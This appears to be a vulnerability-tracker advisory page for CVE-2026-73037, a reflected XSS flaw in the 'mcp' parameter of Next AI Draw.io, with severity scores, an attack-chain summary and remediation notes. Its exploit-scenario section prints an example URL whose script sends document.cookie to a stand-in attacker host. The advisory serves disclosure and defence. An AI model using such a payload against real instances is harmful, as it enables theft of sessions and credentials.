Skip to main content

Next AI Draw.io EUVDEUVD-2026-58196

| CVE-2026-73037 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-08-13 VulnCheck GHSA-7wvw-5p69-5396
5.1
CVSS 4.0 · Vendor: VulnCheck
Share

Severity by source

Vendor (VulnCheck) PRIMARY
5.1 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
6.1 MEDIUM

Network-delivered reflected XSS requires active user interaction (UI:R); payload executes in a different browser origin than the attacker controls, constituting scope change (S:C) with limited confidentiality and integrity impact on that origin.

3.1 AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (VulnCheck).

CVSS VectorVendor: VulnCheck

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
A
Scope
X

Lifecycle Timeline

2
Analysis Generated
Aug 13, 2026 - 19:04 vuln.today
CVE Published
Aug 13, 2026 - 18:18 cve.org
MEDIUM 5.1

DescriptionCVE.org

Next AI Draw.io 0.2.1 through 0.4.16 contains a reflected cross-site scripting vulnerability in the mcp query parameter that is interpolated without escaping into HTML and JavaScript. Attackers can craft malicious URLs to execute arbitrary JavaScript in the localhost origin, enabling exfiltration of diagram sessions and API data.

AnalysisAI

Reflected XSS in Next AI Draw.io 0.2.1 through 0.4.16 allows unauthenticated remote attackers to inject and execute arbitrary JavaScript in the localhost origin by crafting malicious URLs containing a payload in the unsanitized mcp query parameter. Successful exploitation - which requires a victim to click the crafted link - enables theft of diagram session tokens and API credentials accessible within that browser origin. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Craft URL with XSS payload in mcp parameter
Delivery
Deliver link to victim via phishing or social engineering
Exploit
Victim clicks URL and browser loads app
Execution
Application reflects unsanitized mcp value into HTML/JS
Persist
Arbitrary JavaScript executes in localhost browser origin
Impact
Exfiltrate diagram sessions and API credentials to attacker

Vulnerability AssessmentAI

Exploitation The vulnerable endpoint must receive and render the `mcp` query parameter - an attacker-controllable URL parameter interpolated without escaping into HTML/JavaScript output. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 base score of 5.1 (Medium) accurately reflects the primary constraint: mandatory active user interaction (UI:A) means the attacker must socially engineer a victim into clicking a crafted URL rather than exploiting passively. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker constructs a URL targeting the victim's locally running Next AI Draw.io instance with a JavaScript payload embedded in the `mcp` query parameter (e.g., `http://localhost:3000/path?mcp=<script>fetch('https://attacker.example/steal?d='+document.cookie)</script>`), then delivers it via a phishing email or social engineering message. When the victim clicks the link, the application reflects the unescaped parameter into the rendered HTML, causing the browser to execute the attacker's script in the localhost origin. …
Remediation No vendor-released patched version is independently confirmed from available data - the fix reference (https://github.com/DayuanJiang/next-ai-draw-io/issues/917) points to a GitHub issue rather than a tagged release, so the upstream fix availability should be monitored directly in that repository. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-58196 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy